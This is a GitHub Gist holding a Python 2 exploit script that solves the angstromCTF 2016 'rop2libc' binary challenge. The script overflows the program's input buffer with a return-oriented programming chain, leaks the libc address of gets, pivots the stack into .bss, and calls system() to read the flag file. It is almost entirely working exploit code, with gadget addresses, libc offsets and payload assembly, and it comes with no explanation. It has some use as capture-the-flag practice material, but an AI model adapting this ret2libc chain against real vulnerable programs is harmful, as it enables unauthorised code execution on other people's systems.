Last active
March 13, 2021 06:07
-
-
Save st98/6309f0f60eda4a789f36fee6d97f173a to your computer and use it in GitHub Desktop.
angstromCTF 2016 - [binary 160] rop2libc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
from subprocess import * | |
def p64(x): | |
return struct.pack('<Q', x) | |
def u64(x): | |
return struct.unpack('<Q', x)[0] | |
def read_until(f, s): | |
res = '' | |
while not res.endswith(s): | |
res += f.read(1) | |
return res | |
addr_pop_rdi = 0x400633 | |
addr_pop_rsi_r15 = 0x400631 | |
addr_pop_rbp = 0x4004d5 | |
addr_leave = 0x4005a7 | |
addr_printf = 0x400450 | |
addr_gets = 0x400480 | |
addr_bss = 0x601048 | |
addr_got_gets = 0x601030 | |
addr_str = 0x400654 # "... %s" | |
offset_libc_gets = 0x6f440 | |
offset_libc_system = 0x46640 | |
offset_libc_exit = 0x3c290 | |
p = Popen('/problems/rop2libc/rop2libc', stdin=PIPE, stdout=PIPE, stderr=PIPE) | |
payload = '' | |
payload += 'A' * 72 | |
# leak address | |
payload += p64(addr_pop_rdi) | |
payload += p64(addr_str) | |
payload += p64(addr_pop_rsi_r15) | |
payload += p64(addr_got_gets) | |
payload += p64(0x4242424242424242) | |
payload += p64(addr_printf) | |
# flush | |
payload += p64(addr_pop_rdi) | |
payload += p64(addr_bss) | |
payload += p64(addr_gets) | |
payload += p64(addr_pop_rdi) | |
payload += p64(addr_bss) | |
payload += p64(addr_printf) | |
payload += p64(addr_pop_rdi) | |
payload += p64(addr_bss) | |
payload += p64(addr_printf) | |
# stack pivot | |
payload += p64(addr_pop_rdi) | |
payload += p64(addr_bss+0x802) | |
payload += p64(addr_gets) | |
payload += p64(addr_pop_rbp) | |
payload += p64(addr_bss+0x802) | |
payload += p64(addr_leave) | |
padding = '' | |
padding += 'cat /problems/rop2libc/flag.txt && ' | |
padding += 'A' * (0x800 - len(padding)) | |
p.stdin.write(payload + '\n') | |
p.stdin.write(padding + '\n') | |
read_until(p.stdout, 'said: ') | |
read_until(p.stdout, 'said: ') | |
t = read_until(p.stdout, '\n')[:-1] | |
libc_base = u64(t.ljust(8, '\0')) - offset_libc_gets | |
stack = '' | |
stack += 'AAAAAAAA' | |
stack += p64(addr_pop_rdi) | |
stack += p64(addr_bss) | |
stack += p64(libc_base + offset_libc_system) | |
stack += p64(libc_base + offset_libc_exit) | |
p.stdin.write(stack + '\n') | |
print p.stdout.read() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment